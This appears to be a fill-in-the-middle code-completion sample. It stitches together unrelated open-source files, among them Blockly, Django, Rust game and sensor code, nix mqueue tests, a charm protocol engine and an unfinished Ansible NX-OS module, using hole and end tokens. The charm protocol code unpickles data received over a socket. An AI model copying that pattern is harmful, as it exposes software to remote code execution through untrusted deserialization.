'block' : 'none'; }; /** * @override */ Blockly.FieldCheckbox.prototype.render_ = function() { if (this.textContent_) { this.textContent_.nodeValue = this.getDisplayText_(); } this.updateSize_(this.getConstants().FIELD_CHECKBOX_X_OFFSET); }; /** * @override */ Blockly.FieldCheckbox.prototype.getDisplayText_ = function() { return this.checkChar_ || Blockly.FieldCheckbox.CHECK_CHAR; }; /** * Set the character used for the check mark. * @param {?string} character The character to use for the check mark, or * null to use the default. */ Blockly.FieldCheckbox.prototype.setCheckCharacter = function(character) { this.checkChar_ = character; this.forceRerender(); }; /** * Toggle the state of the checkbox on click. * @protected */ Blockly.FieldCheckbox.prototype.showEditor_ = function() { this.setValue(!this.value_); }; /** * Ensure that the input value is valid ('TRUE' or 'FALSE'). * @param {*=} opt_newValue The input value. * @return {?string} A valid value ('TRUE' or 'FALSE), or null if invalid. * @protected */ Blockly.FieldCheckbox.prototype.doClassValidation_ = function(opt_newValue) { if (opt_newValue === true || opt_newValue === 'TRUE') { return 'TRUE'; } if (opt_newValue === false || opt_newValue === 'FALSE') { return 'FALSE'; } return null; }; /** * Update the value of the field, and update the checkElement. * @param {*} newValue The value to be saved. The default validator guarantees * that this is a either 'TRUE' or 'FALSE'. * @protected */<|fim▁hole|>Blockly.FieldCheckbox.prototype.doValueUpdate_ = function(newValue) { this.value_ = this.convertValueToBool_(newValue); // Update visual. if (this.textElement_) { this.textElement_.style.display = this.value_ ? 'block' : 'none'; } }; /** * Get the value of this field, either 'TRUE' or 'FALSE'. * @return {string} The value of this field. */ Blockly.FieldCheckbox.prototype.getValue = function() { return this.value_ ? 'TRUE' : 'FALSE'; }; /** * Get the boolean value of this field. * @return {boolean} The boolean value of this field. */ Blockly.FieldCheckbox.prototype.getValueBoolean = function() { return /** @type {boolean} */ (this.value_); }; /** * Get the text of this field. Used when the block is collapsed. * @return {string} Text representing the value of this field * ('true' or 'false'). */ Blockly.FieldCheckbox.prototype.getText = function() { return String(this.convertValueToBool_(this.value_)); }; /** * Convert a value into a pure boolean. * * Converts 'TRUE' to true and 'FALSE' to false correctly, everything else * is cast to a boolean. * @param {*} value The value to convert. * @return {boolean} The converted value. * @private */ Blockly.FieldCheckbox.prototype.convertValueToBool_ = function(value) { if (typeof value == 'string') { return value == 'TRUE'; } else { return !!value; } }; Blockly.fieldRegistry.register('field_checkbox', Blockly.FieldCheckbox);<|fim▁end|>
<|file_name|>set_mana.rs<|end_file_name|><|fim▁begin|>use rune_vm::Rune; use rustc_serialize::json; use game_state::GameState; use minion_card::UID; use hlua; #[derive(RustcDecodable, RustcEncodable, Clone, Debug)] pub struct SetMana { controller_uid: UID, mana: u8, } implement_for_lua!(SetMana, |mut _metatable| {}); impl SetMana { pub fn new(controller_uid: UID, mana: u8) -> SetMana {<|fim▁hole|> controller_uid: controller_uid, mana: mana, } } pub fn to_rune(&self) -> Box<Rune> { Box::new(self.clone()) } } impl Rune for SetMana { fn execute_rune(&self, game_state: &mut GameState) { game_state.get_mut_controller_by_uid(self.controller_uid).unwrap().set_mana(self.mana); } fn can_see(&self, _controller: UID, _game_state: &GameState) -> bool { return true; } fn to_json(&self) -> String { json::encode(self).unwrap().replace("{", "{\"runeType\":\"SetMana\",") } fn into_box(&self) -> Box<Rune> { Box::new(self.clone()) } }<|fim▁end|>
SetMana {
<|file_name|>urls.py<|end_file_name|><|fim▁begin|><|fim▁hole|> from django.conf import settings from django.conf.urls import patterns, url from ..profile_images.views import ProfileImageView from .accounts.views import AccountDeactivationView, AccountViewSet from .preferences.views import PreferencesView, PreferencesDetailView from .verification_api.views import PhotoVerificationStatusView ME = AccountViewSet.as_view({ 'get': 'get', }) ACCOUNT_LIST = AccountViewSet.as_view({ 'get': 'list', }) ACCOUNT_DETAIL = AccountViewSet.as_view({ 'get': 'retrieve', 'patch': 'partial_update', }) urlpatterns = patterns( '', url(r'^v1/me$', ME, name='own_username_api'), url(r'^v1/accounts/{}$'.format(settings.USERNAME_PATTERN), ACCOUNT_DETAIL, name='accounts_api'), url(r'^v1/accounts$', ACCOUNT_LIST, name='accounts_detail_api'), url( r'^v1/accounts/{}/image$'.format(settings.USERNAME_PATTERN), ProfileImageView.as_view(), name='accounts_profile_image_api' ), url( r'^v1/accounts/{}/deactivate/$'.format(settings.USERNAME_PATTERN), AccountDeactivationView.as_view(), name='accounts_deactivation' ), url( r'^v1/accounts/{}/verification_status/$'.format(settings.USERNAME_PATTERN), PhotoVerificationStatusView.as_view(), name='verification_status' ), url( r'^v1/preferences/{}$'.format(settings.USERNAME_PATTERN), PreferencesView.as_view(), name='preferences_api' ), url( r'^v1/preferences/{}/(?P<preference_key>[a-zA-Z0-9_]+)$'.format(settings.USERNAME_PATTERN), PreferencesDetailView.as_view(), name='preferences_detail_api' ), )<|fim▁end|>
""" Defines the URL routes for this app. """
<|file_name|>checkout.js<|end_file_name|><|fim▁begin|>'use strict'; angular.module('shopnxApp') .config(function ($stateProvider) { $stateProvider .state('checkout', { title: 'Checkout with the items you selected', url: '/checkout',<|fim▁hole|> }); });<|fim▁end|>
templateUrl: 'app/checkout/checkout.html', controller: 'CheckoutCtrl', authenticate: true
<|file_name|>models.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- from django.db import models from datetime import datetime class Place(models.Model): """ Holder object for basic info about the rooms in the university. """ room_place = models.CharField(max_length=255) floor = models.IntegerField() def __unicode__(self): return self.room_place class HierarchyUnit(models.Model): PROGRAM = 'PR' YEAR = 'YR' GROUP = 'GR' TYPES = ( (PROGRAM, u"Специалност"), (YEAR, u"Курс"), (GROUP, u"Група"), ) type_value = models.CharField(max_length=255, choices=TYPES) value = models.CharField(max_length=255) parent = models.ForeignKey("schedule.HierarchyUnit", null=True, blank=True, default=None) def get_all_info_for_parents(self): if self.type_value == 'PR': return self.value if self.type_value == 'YR': return ', '.join([self.parent.value, self.value+u' курс']) else: return ', '.join([self.parent.parent.value, self.parent.value+u' курс', self.value+u' група']) def get_all_childs(self): return HierarchyUnit.objects.filter(parent=self) def __unicode__(self): return self.get_all_info_for_parents() class Block(models.Model): """ Group representing a set of optional subjects. Example: Core of Computer Science. """ name = models.CharField(max_length=255) def __unicode__(self): return self.name class Subject(models.Model): """ Representation of all subjects. Example: Calculus 1. """ MANDATORY = 'MN' OPTIONAL = 'OP' TYPES = ( (MANDATORY, u"Задължителен"), (OPTIONAL, u"Избираем"), ) type_value = models.CharField(max_length=255, choices=TYPES) name = models.CharField(max_length=255) block = models.ForeignKey(Block, null=True, blank=True, default=None)<|fim▁hole|> year = models.ForeignKey(HierarchyUnit, null=True, blank=True, default=None, limit_choices_to={'type_value': HierarchyUnit.YEAR}) def get_year_value(self): return ', '.join([self.year.parent.value, self.year.value+u' курс']) def __unicode__(self): return self.name class Department(models.Model): """ Group representing a set of lecturers grouped by field of teaching. 
""" name = models.CharField(max_length=255) def __unicode__(self): return self.name class Teacher(models.Model): name = models.CharField(max_length=255) title = models.CharField(max_length=255) email = models.CharField(max_length=255) full_name = models.CharField(max_length=255) position = models.CharField(max_length=255) subjects = models.ManyToManyField(Subject, null=True, blank=True, default=None) department = models.ForeignKey(Department, null=True, blank=True, default=None) def __unicode__(self): return self.name class Event(models.Model): WEEKLY = 'WKL' TYPES = ( (WEEKLY, u'Седмично'), ) type_value = models.CharField(max_length=255, null=True, blank=True, default=None) inserted = models.DateField(default=datetime.now()) name = models.CharField(max_length=255) place = models.ForeignKey(Place, blank=True, default=None, null=True) date_start = models.DateTimeField() date_end = models.DateTimeField(default=datetime.now()) repeatable = models.BooleanField() duratation = models.IntegerField() subject = models.ForeignKey(Subject, blank=True, default=None, null=True) teacher = models.ForeignKey(Teacher, blank=True, default=None, null=True) def __unicode__(self): return self.name class Student(models.Model): PROGRAM = (('BK', 'Бакалавър'),('MG', 'Магистър')) name = models.CharField(max_length=255) program = models.CharField(max_length=255,choices=PROGRAM, blank=True, default=PROGRAM[0][0]) fac_number = models.CharField(max_length=255) email = models.CharField(max_length=255) group = models.ForeignKey(HierarchyUnit, limit_choices_to={'type_value': HierarchyUnit.GROUP}, blank=True, default=None, null=True) events = models.ManyToManyField(Event, blank=True, default=None, null=True) def __unicode__(self): return self.name class Comment(models.Model): from_user = models.ForeignKey(Student, blank=True, default=None, null=True) event = models.ForeignKey(Event, blank=True, default=None, null=True) start_date = models.DateField() end_date = models.DateField() dtstamp = models.DateField(default=datetime.now()) desc = models.TextField()<|fim▁end|>
<|file_name|>app.po.ts<|end_file_name|><|fim▁begin|>import { browser, by, element, promise, Key } from 'protractor'; export class AppPage { navigateTo(): Promise<unknown> { return browser.get(browser.baseUrl) as Promise<unknown>; } getTextareaCount(): promise.Promise<number> { return element.all(by.css('app-root textarea')).count(); } getTextareaHeight(index: number): promise.Promise<number> {<|fim▁hole|> const area = element.all(by.css(`app-root textarea`)).get(index); area.clear(); value.split('\n').forEach(line => { area.sendKeys(line); area.sendKeys(Key.ENTER); }); } reset(): void { element(by.tagName('button')).click(); } }<|fim▁end|>
return element.all(by.css(`app-root textarea`)).get(index).getSize().then(size => size.height); } setTextareaValue(index: number, value: string): void {
<|file_name|>zhuyin_table.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # # zhuyin_table.py # cjktools # """ An interface to the zhuyin <-> pinyin table. """ from functools import partial from . import cjkdata from cjktools.common import get_stream_context, stream_codec def _default_stream(): return open(cjkdata.get_resource('tables/zhuyin_pinyin_conv_table')) _get_stream_context = partial(get_stream_context, _default_stream) def parse_lines(istream): istream = stream_codec(istream) for line in istream: if not line.startswith('#'): yield line.rstrip().split() def zhuyin_to_pinyin_table(istream=None): """ Returns a dictionary mapping zhuyin to pinyin. """ with _get_stream_context(istream) as stream: table = {} for zhuyin, pinyin in parse_lines(stream): table[zhuyin] = pinyin return table def pinyin_to_zhuyin_table(istream=None): """ Returns a dictionary mapping zhuyin to pinyin. """ with _get_stream_context(istream) as istream: table = {} for zhuyin, pinyin in parse_lines(istream): table[pinyin] = zhuyin return table def get_all_pinyin(istream=None): """ Returns a list of all pinyin """ with _get_stream_context(istream) as istream: all_pinyin = ['r'] for zhuyin, pinyin in parse_lines(istream): all_pinyin.append(pinyin) return all_pinyin def pinyin_regex_pattern(istream=None): """ Returns a pinyin regex pattern, with optional tone number. """ all_pinyin = get_all_pinyin(istream) <|fim▁hole|> # Build a generic pattern for a single pinyin with an optional tone. pattern = '(%s)([0-5]?)' % '|'.join(all_pinyin) return pattern def zhuyin_regex_pattern(istream=None): """ Returns a zhuyin regex pattern. """ with _get_stream_context(istream) as istream: all_pinyin = [] for zhuyin, pinyin in parse_lines(istream): all_pinyin.append(pinyin) pattern = '(%s)[0-4]?' % '|'.join(all_pinyin) return pattern<|fim▁end|>
# Sort from longest to shortest, so as to make maximum matches whenever # possible. all_pinyin = sorted(all_pinyin, key=len, reverse=True)
<|file_name|>sensor_data.rs<|end_file_name|><|fim▁begin|>use std::{ fmt::{self, Display}, io, time::{Duration, SystemTime, UNIX_EPOCH}, }; use crate::{average::Average, json_display::JsonDisplay, sensors::Sensor}; macro_rules! convTimeEpochDuration { ($systemtime:expr) => { $systemtime .duration_since(UNIX_EPOCH) .expect("Time went backwards") }; } macro_rules! convDurationMs { ($duration:expr) => { $duration.as_secs() * 1000 + $duration.subsec_nanos() as u64 / 1_000_000 }; } #[derive(Copy, Clone)] pub struct SensorData { timestamp: Duration, bmp280_pressure: f32, bmp280_temperature: i32, htu21_temperature: i32, htu21_humidity: i32, } pub struct SensorCumulatedData { timestamp: Duration, bmp280_pressure: f64, bmp280_temperature: i64, htu21_temperature: i64, htu21_humidity: i64, } impl SensorData { pub fn new( timestamp: SystemTime, bmp280_pressure: f32, bmp280_temperature: i32, htu21_temperature: i32, htu21_humidity: i32, ) -> SensorData { SensorData { timestamp: convTimeEpochDuration!(timestamp), bmp280_pressure, bmp280_temperature, htu21_temperature, htu21_humidity, } } pub fn create( sensor_bmp280_pressure: &Sensor, sensor_bmp280_temperature: &Sensor, sensor_htu21_temperature: &Sensor, sensor_htu21_humidity: &Sensor, ) -> SensorData { SensorData::new( SystemTime::now(), sensor_bmp280_pressure.get::<f32>(), sensor_bmp280_temperature.get::<i32>(), sensor_htu21_temperature.get::<i32>(), sensor_htu21_humidity.get::<i32>(), ) } pub fn get_bmp280_pressure(&self) -> f32 { self.bmp280_pressure } pub fn get_bmp280_temperature(&self) -> i32 { self.bmp280_temperature } pub fn get_htu21_temperature(&self) -> i32 { self.htu21_temperature } pub fn get_htu21_humidity(&self) -> i32 { self.htu21_humidity } } impl Display for SensorData { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!( f, "\ttime = {}\n\tpressure = {}\n\tbmp280Temp= {}\n\thtu21Temp = {}\n\thumidity = {}\n", convDurationMs!(self.timestamp), self.bmp280_pressure, self.bmp280_temperature, self.htu21_temperature, self.htu21_humidity ) } } impl JsonDisplay for SensorData { fn json_item(&self, w: &mut io::Write) -> io::Result<()> { w.write_fmt(format_args!( "{{\"timestamp\": {},\n\"pressure\" : {:.2},\n\"bmp280Temp\": {:.3},\n\"htu21Temp\" : {:.3},\n\"humidity\" : {:.2}}}\n", convDurationMs!(self.timestamp), self.bmp280_pressure * 10.0, self.bmp280_temperature as f32 / 1000.0, self.htu21_temperature as f32 / 1000.0, self.htu21_humidity as f32 / 1000.0 )) } } impl Average<SensorData> for SensorData { type Acc = SensorCumulatedData; fn empty_cumulator() -> Self::Acc { SensorCumulatedData { timestamp: Duration::new(0, 0), bmp280_pressure: 0.0, bmp280_temperature: 0, htu21_temperature: 0, htu21_humidity: 0, } } fn cumulate<'a, 'b>(&'a self, cumulated_data: &'b mut Self::Acc) -> &'b Self::Acc { cumulated_data.timestamp += self.timestamp; cumulated_data.bmp280_pressure += self.bmp280_pressure as f64; cumulated_data.bmp280_temperature += self.bmp280_temperature as i64; cumulated_data.htu21_temperature += self.htu21_temperature as i64; cumulated_data.htu21_humidity += self.htu21_humidity as i64; cumulated_data } fn divide(cumulated_data: &Self::Acc, nb_elements: usize) -> SensorData { SensorData { timestamp: (cumulated_data.timestamp / nb_elements as u32),<|fim▁hole|> htu21_temperature: (cumulated_data.htu21_temperature / nb_elements as i64) as i32, htu21_humidity: (cumulated_data.htu21_humidity / nb_elements as i64) as i32, } } }<|fim▁end|>
bmp280_pressure: (cumulated_data.bmp280_pressure / nb_elements as f64) as f32, bmp280_temperature: (cumulated_data.bmp280_temperature / nb_elements as i64) as i32,
<|file_name|>3b0d1321079e_.py<|end_file_name|><|fim▁begin|>"""Add replies column Revision ID: 3b0d1321079e Revises: 1e2d77a2f0c4 Create Date: 2021-11-03 23:32:15.720557 """ from alembic import op import sqlalchemy as sa import sqlalchemy_utils from sqlalchemy.dialects import postgresql # revision identifiers, used by Alembic. revision = "3b0d1321079e" down_revision = "1e2d77a2f0c4" branch_labels = None<|fim▁hole|> def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.add_column( "comment", sa.Column( "replies", postgresql.JSONB(astext_type=sa.Text()), nullable=True ), ) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_column("comment", "replies") # ### end Alembic commands ###<|fim▁end|>
depends_on = None
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># Copyright 2012 Leonidas Poulopoulos #<|fim▁hole|># You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License.<|fim▁end|>
# Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License.
<|file_name|>test_mq.rs<|end_file_name|><|fim▁begin|>use libc::c_long; use std::ffi::CString; use std::str; use nix::errno::Errno::*; use nix::Error::Sys; use nix::mqueue::{mq_open, mq_close, mq_send, mq_receive, mq_getattr, mq_setattr, mq_unlink, mq_set_nonblock, mq_remove_nonblock}; use nix::mqueue::{MqAttr, MQ_OFlag}; use nix::sys::stat::Mode; #[test] fn test_mq_send_and_receive() { const MSG_SIZE: c_long = 32; let attr = MqAttr::new(0, 10, MSG_SIZE, 0); let mq_name= &CString::new(b"/a_nix_test_queue".as_ref()).unwrap(); let oflag0 = MQ_OFlag::O_CREAT | MQ_OFlag::O_WRONLY; let mode = Mode::S_IWUSR | Mode::S_IRUSR | Mode::S_IRGRP | Mode::S_IROTH; let r0 = mq_open(mq_name, oflag0, mode, Some(&attr)); if let Err(Sys(ENOSYS)) = r0 { println!("message queues not supported or module not loaded?"); return; }; let mqd0 = r0.unwrap(); let msg_to_send = "msg_1"; mq_send(mqd0, msg_to_send.as_bytes(), 1).unwrap(); let oflag1 = MQ_OFlag::O_CREAT | MQ_OFlag::O_RDONLY; let mqd1 = mq_open(mq_name, oflag1, mode, Some(&attr)).unwrap(); let mut buf = [0u8; 32]; let mut prio = 0u32; let len = mq_receive(mqd1, &mut buf, &mut prio).unwrap(); assert!(prio == 1); mq_close(mqd1).unwrap(); mq_close(mqd0).unwrap(); assert_eq!(msg_to_send, str::from_utf8(&buf[0..len]).unwrap()); } #[test] fn test_mq_getattr() { const MSG_SIZE: c_long = 32; let initial_attr = MqAttr::new(0, 10, MSG_SIZE, 0); let mq_name = &CString::new(b"/attr_test_get_attr".as_ref()).unwrap(); let oflag = MQ_OFlag::O_CREAT | MQ_OFlag::O_WRONLY; let mode = Mode::S_IWUSR | Mode::S_IRUSR | Mode::S_IRGRP | Mode::S_IROTH; let r = mq_open(mq_name, oflag, mode, Some(&initial_attr)); if let Err(Sys(ENOSYS)) = r { println!("message queues not supported or module not loaded?"); return; }; let mqd = r.unwrap(); let read_attr = mq_getattr(mqd); assert!(read_attr.unwrap() == initial_attr); mq_close(mqd).unwrap(); } // FIXME: Fix failures for mips in QEMU #[test] #[cfg_attr(any(target_arch = "mips", target_arch = "mips64"), ignore)] fn test_mq_setattr() { const MSG_SIZE: c_long = 32; let initial_attr = MqAttr::new(0, 10, MSG_SIZE, 0); let mq_name = &CString::new(b"/attr_test_get_attr".as_ref()).unwrap(); let oflag = MQ_OFlag::O_CREAT | MQ_OFlag::O_WRONLY; let mode = Mode::S_IWUSR | Mode::S_IRUSR | Mode::S_IRGRP | Mode::S_IROTH; let r = mq_open(mq_name, oflag, mode, Some(&initial_attr)); if let Err(Sys(ENOSYS)) = r { println!("message queues not supported or module not loaded?"); return; }; let mqd = r.unwrap(); let new_attr = MqAttr::new(0, 20, MSG_SIZE * 2, 100); let old_attr = mq_setattr(mqd, &new_attr); assert!(old_attr.unwrap() == initial_attr); let new_attr_get = mq_getattr(mqd); // The following tests make sense. 
No changes here because according to the Linux man page only // O_NONBLOCK can be set (see tests below) assert!(new_attr_get.unwrap() != new_attr); let new_attr_non_blocking = MqAttr::new(MQ_OFlag::O_NONBLOCK.bits() as c_long, 10, MSG_SIZE, 0); mq_setattr(mqd, &new_attr_non_blocking).unwrap(); let new_attr_get = mq_getattr(mqd); // now the O_NONBLOCK flag has been set assert!(new_attr_get.unwrap() != initial_attr); assert!(new_attr_get.unwrap() == new_attr_non_blocking); mq_close(mqd).unwrap(); } // FIXME: Fix failures for mips in QEMU #[test] #[cfg_attr(any(target_arch = "mips", target_arch = "mips64"), ignore)] fn test_mq_set_nonblocking() { const MSG_SIZE: c_long = 32; let initial_attr = MqAttr::new(0, 10, MSG_SIZE, 0); let mq_name = &CString::new(b"/attr_test_get_attr".as_ref()).unwrap(); let oflag = MQ_OFlag::O_CREAT | MQ_OFlag::O_WRONLY; let mode = Mode::S_IWUSR | Mode::S_IRUSR | Mode::S_IRGRP | Mode::S_IROTH; let r = mq_open(mq_name, oflag, mode, Some(&initial_attr)); if let Err(Sys(ENOSYS)) = r { println!("message queues not supported or module not loaded?"); return; }; let mqd = r.unwrap(); mq_set_nonblock(mqd).unwrap(); let new_attr = mq_getattr(mqd); assert!(new_attr.unwrap().flags() == MQ_OFlag::O_NONBLOCK.bits() as c_long); mq_remove_nonblock(mqd).unwrap(); let new_attr = mq_getattr(mqd); assert!(new_attr.unwrap().flags() == 0); mq_close(mqd).unwrap(); } #[test] fn test_mq_unlink() { const MSG_SIZE: c_long = 32; let initial_attr = MqAttr::new(0, 10, MSG_SIZE, 0); let mq_name_opened = &CString::new(b"/mq_unlink_test".as_ref()).unwrap(); let mq_name_not_opened = &CString::new(b"/mq_unlink_test".as_ref()).unwrap(); let oflag = MQ_OFlag::O_CREAT | MQ_OFlag::O_WRONLY; let mode = Mode::S_IWUSR | Mode::S_IRUSR | Mode::S_IRGRP | Mode::S_IROTH; let r = mq_open(mq_name_opened, oflag, mode, Some(&initial_attr)); if let Err(Sys(ENOSYS)) = r { println!("message queues not supported or module not loaded?"); return; }; let mqd = r.unwrap();<|fim▁hole|> let res_unlink_not_opened = mq_unlink(mq_name_not_opened); assert!(res_unlink_not_opened == Err(Sys(ENOENT)) ); mq_close(mqd).unwrap(); let res_unlink_after_close = mq_unlink(mq_name_opened); assert!(res_unlink_after_close == Err(Sys(ENOENT)) ); }<|fim▁end|>
let res_unlink = mq_unlink(mq_name_opened); assert!(res_unlink == Ok(()) );
<|file_name|>protocol.py<|end_file_name|><|fim▁begin|># TODO: provide a transition checker that prevents a feedback loop, inconsistent state. # in user db that way user can eliminate store step on the receive side. from charm.core.engine.util import * from charm.toolbox.enum import Enum from math import log, ceil debug = False # standardize responses between client and server # code = Enum('Success', 'Fail', 'Repeat', 'StartSubprotocol', 'EndSubprotocol') class Protocol: def __init__(self, error_states, max_size=2048): # any init information? global error self.p_ID = 0 self.p_ctr = 0 error = error_states # dictionary of party types (each type gets an identifier) self.partyTypes = {} self.party = {} self._serialize = False self.db = {} # initialize the database self.max_size = max_size self.prefix_size = ceil(log(max_size, 256)) def setup(self, *args): # handles the hookup between parties involved Error = True for arg in args: if isinstance(arg, dict): print("Setup of: ", arg['name']) if not self.addInstance(arg): Error = False else: print(type(arg)) return Error def addInstance(self, obj): p_ctr = self.p_ctr for i in self.partyTypes.keys(): if i == obj['type']: # we find the party type self.party[p_ctr] = {} self.party[p_ctr]['name'], self.party[p_ctr]['socket'] = obj['name'], obj['socket'] self.party[p_ctr]['type'], self.party[p_ctr]['states'] = obj['type'], self.partyTypes[i]['states'] self.party[p_ctr]['init'] = self.partyTypes[i]['init'] self.p_ctr += 1 print("Adding party instance w/ id: ", p_ctr) return True return None def addPartyType(self, type, state_map, trans_map, init_state=False): ExistingTypeFound = False # see if type already exists. break and return if so for i in self.partyTypes.keys(): if self.partyTypes[i]['type'] == type: ExistingTypeFound = True break # means we are adding a new type if not ExistingTypeFound: p_ID = self.p_ID party = {'type':type, 'id':p_ID } if(isinstance(state_map, dict)): party['states'] = state_map # function pointers for state functions... if(isinstance(trans_map, dict)): party['transitions'] = trans_map party['init'] = init_state # which state initializes the protocol self.partyTypes[type] = party # makes sure self.p_ID += 1 return True return False # # def addValidTransitions(self, trans_map): # if isinstance(trans_map, dict): # self.trans_map = trans_map def listStates(self, partyID): # check if a member parameter is defined if partyID < self.p_ctr: return self.party[partyID]['states'] return None def listParties(self): return list(self.party.keys()) def listParyTypes(self): return list(self.partyTypes.keys()) def getInitState(self, _type): for i in self.listParties(): if self.party[i]['type'] == _type: self._socket = self.party[i]['socket'] if self.party[i]['init']: # set current trans starting point self.cur_state = 1 return (True, self.listStates(i)[1]) else: self.cur_state = 2 return (False, self.listStates(i)[2]) print("Returning junk!") return (False, None) def setState(self, state_num): # find the corresponding call back based on current party id self.nextCall = None if state_num == None: return None nextPossibleState = self._cur_trans.get(self.cur_state) if type(nextPossibleState) == list and not state_num in nextPossibleState: print("Invalid State Transition! Error!") print("\tCurrent state: ", self.cur_state) print("\tNext state: ", state_num) print("Allowed states: ", nextPossibleState) elif type(nextPossibleState) != list and nextPossibleState != state_num: print("Invalid State Transition! 
Error!") print("\tCurrent state: ", self.cur_state) print("\tNext state not allowed: ", state_num) # do not make the transition return None for i in self.listParties(): states = self.listStates(i) if states.get(state_num) != None: self.nextCall = states.get(state_num) # preparing for state transition here. self.cur_state = state_num break return None def send_msg(self, object): # use socket to send message (check if serializaton is required) if self._socket != None: if self._serialize: result = self._user_serialize(object) else: result = self.serialize(object) #print("DEBUG: send_msg : result =>", result) if len(result) > self.max_size: print("Message too long! max_size="+str(self.max_size)) return None result = len(result).to_bytes(length=self.prefix_size, byteorder='big') + result self._socket.send(result) return None # receives exactly n bytes def recv_all(self, n): recvd = 0 res = b'' while recvd < n: res = res + self._socket.recv(n-recvd) recvd = len(res) return res def recv_msg(self): # read the socket and return the received message (check if deserialization) # is necessary if self._socket != None: # block until data is available or remote host closes connection msglen = int.from_bytes(self.recv_all(self.prefix_size), byteorder='big') result = self.recv_all(msglen) if result == '': return None else: if self._serialize: return self._user_deserialize(result) else: # default serialize call return self.deserialize(result) return None # # serialize an object # def serialize(self, object): # if type(object) == str: # return bytes(object, 'utf8') # return object # # def deserialize(self, object): # if type(object) == bytes: # return object.decode('utf8') # return object def setSubclassVars(self, group, state=None): if hasattr(group, 'serialize') and hasattr(group, 'deserialize'): self.group = group if state != None: if type(state) == dict: self.db = state def get(self, keys, _type=tuple): if not type(keys) == list: return if _type == tuple: ret = [] else: ret = {} # get the data for i in keys: if _type == tuple: ret.append(self.db[i]) else: # dict ret[ i ] = self.db[i] # return data if _type == tuple: return tuple(ret) return ret def store(self, *args): for i in args: if isinstance(i, tuple): self.db[ i[0] ] = i[1] return None def serialize(self, object): # print("input object... => ", object) if type(object) == dict: bytes_object = serializeDict(object, self.group) return pickleObject(bytes_object) elif type(object) == str: return pickleObject(object) else: # print("serialize: just =>", object) return object def deserialize(self, bytes_object): # print("deserialize input =>", bytes_object) if type(bytes_object) == bytes: object = unpickleObject(bytes_object) if isinstance(object, dict): return deserializeDict(object, self.group) return object # OPTIONAL # derived class must call this function in order to def setSerializers(self, serial, deserial): self._serialize = True self._user_serialize = serial self._user_deserialize = deserial return None # records the final state of a protocol execution def setErrorCode(self, value): self.result = value # executes state machine from the 'party_type' perspective def execute(self, party_type, close_sock=True): print("Party Descriptions:") print(self.listParyTypes(), "\n") # print("Executing protocol engine...") # assume there are two parties: support more in the future. 
# if len(self.listParties()) == 2: # p1, p2 = self.listParties() # print(self.listParties()) # main loop # Timeout = False (start, func) = self.getInitState(party_type) self._cur_trans = self.partyTypes[party_type]['transitions'] #print("Possible transitions: ", self._cur_trans) print("Starting Point => ", func.__name__) if start == True: # call the first state for party1, then send msg output = func.__call__() if type(output) == dict: self.db.update(output) self.send_msg(output) else: # first receive message, call state function # then send call response input = self.recv_msg() if type(input) == dict: # print("input db :=>", input) self.db.update(input) output = func.__call__(input) if isinstance(output, dict): # print("output db :=>", output) self.db.update(output) self.send_msg(output) # take output and send back to other party via socket while self.nextCall != None: input = self.recv_msg() if isinstance(input, dict): self.db.update(input) output = self.nextCall.__call__(input) if output != None: if isinstance(output, dict): self.db.update(output) self.send_msg(output) if close_sock: self.clean() return output def check(self): # cycle through parties, make sure they are differntly typed? # p_ID must be at least 2 # ... pass def clean(self):<|fim▁hole|> if debug: print("Cleaning database...") self._socket.close() self.db.clear() print("PROTOCOL COMPLETE!") return None<|fim▁end|>
<|file_name|>nxos_udld_interface.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'version': '1.0'} DOCUMENTATION = ''' --- module: nxos_udld_interface version_added: "2.2" short_description: Manages UDLD interface configuration params. description: - Manages UDLD interface configuration params. extends_documentation_fragment: nxos author: - Jason Edelman (@jedelman8) notes: - Feature UDLD must be enabled on the device to use this module. options: mode: description: - Manages UDLD mode for an interface. required: true choices: ['enabled','disabled','aggressive'] interface: description: - FULL name of the interface, i.e. Ethernet1/1- required: true state: description: - Manage the state of the resource. required: false default: present choices: ['present','absent'] ''' EXAMPLES = ''' # ensure Ethernet1/1 is configured to be in aggressive mode - nxos_udld_interface: interface: Ethernet1/1 mode: aggressive state: present host: "{{ inventory_hostname }}" username: "{{ un }}" password: "{{ pwd }}" # Remove the aggressive config only if it's currently in aggressive mode and then disable udld (switch default) - nxos_udld_interface: interface: Ethernet1/1 mode: aggressive state: absent host: "{{ inventory_hostname }}" username: "{{ un }}" password: "{{ pwd }}" # ensure Ethernet1/1 has aggressive mode enabled - nxos_udld_interface:<|fim▁hole|> host: "{{ inventory_hostname }}" username: "{{ un }}" password: "{{ pwd }}" ''' RETURN = ''' proposed: description: k/v pairs of parameters passed into module returned: always type: dict sample: {"mode": "enabled"} existing: description: - k/v pairs of existing configuration type: dict sample: {"mode": "aggressive"} end_state: description: k/v pairs of configuration after module execution returned: always type: dict sample: {"mode": "enabled"} updates: description: command sent to the device returned: always type: list sample: ["interface ethernet1/33", "no udld aggressive ; no udld disable"] changed: description: check to see if a change was made on the device returned: always type: boolean sample: true ''' import json # COMMON CODE FOR MIGRATION import re from ansible.module_utils.basic import get_exception from ansible.module_utils.netcfg import NetworkConfig, ConfigLine from ansible.module_utils.shell import ShellError try: from ansible.module_utils.nxos import get_module except ImportError: from ansible.module_utils.nxos import NetworkModule def to_list(val): if isinstance(val, (list, tuple)): return list(val) elif val is not None: return [val] else: return list() class CustomNetworkConfig(NetworkConfig): def expand_section(self, configobj, S=None): if S is 